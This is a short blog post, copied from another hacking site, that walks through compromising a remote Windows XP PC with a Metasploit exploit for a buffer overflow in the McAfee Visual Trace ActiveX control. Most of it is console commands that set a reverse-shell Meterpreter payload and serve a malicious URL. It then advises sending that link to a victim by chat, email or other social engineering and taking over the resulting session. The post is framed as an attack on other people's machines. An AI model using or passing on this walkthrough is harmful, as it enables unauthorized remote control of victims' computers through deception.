lunes, 26 de enero de 2015

How to Hack Remote PC using McAfee Visual Trace ActiveX Control Buffer Overflow

This module exploits a stack buffer overflow in the McAfee Visual Trace 3.25 ActiveX Control (NeoTraceExplorer.dll 1.0.0.1). By sending a overly long string to the “Trace Target ()” method, an attacker may be able to execute arbitrary code.
Exploit Targets
McAfee Visual Trace 3.25
Windows XP Service Pack 2, 3
Requirement
Attacker: Backtrack 5
Victim PC: Windows XP
Open backtrack terminal type msfconsole
Now type use exploit/windows/browser/mcafeevisualtrace_tracetarget
Msf exploit (mcafeevisualtrace_tracetarget)>set payload windows/meterpreter/reverse_tcp
Msf exploit (mcafeevisualtrace_tracetarget)>set lhost 192.168.1.2 (IP of Local Host)
Msf exploit (mcafeevisualtrace_tracetarget)>set srvhost 192.168.1.2 (This must be an address on the local machine)
Msf exploit (mcafeevisualtrace_tracetarget)>set uripath trace (The Url to use for this exploit)
Msf exploit (mcafeevisualtrace_tracetarget)>exploit
Now an URL you should give to your victim http://192.168.1.2:8080/trace

Send the link of the server to the victim via chat or email or any social engineering technique.
Now you have access to the victims PC. Use “Sessions -l” and the Session number to connect to the session. And Now Type “sessions -i ID


Fuente: http://www.hackingarticles.in/how-to-hack-remote-pc-using-mcafee-visual-trace-activex-control-buffer-overflow/

No hay comentarios:

Publicar un comentario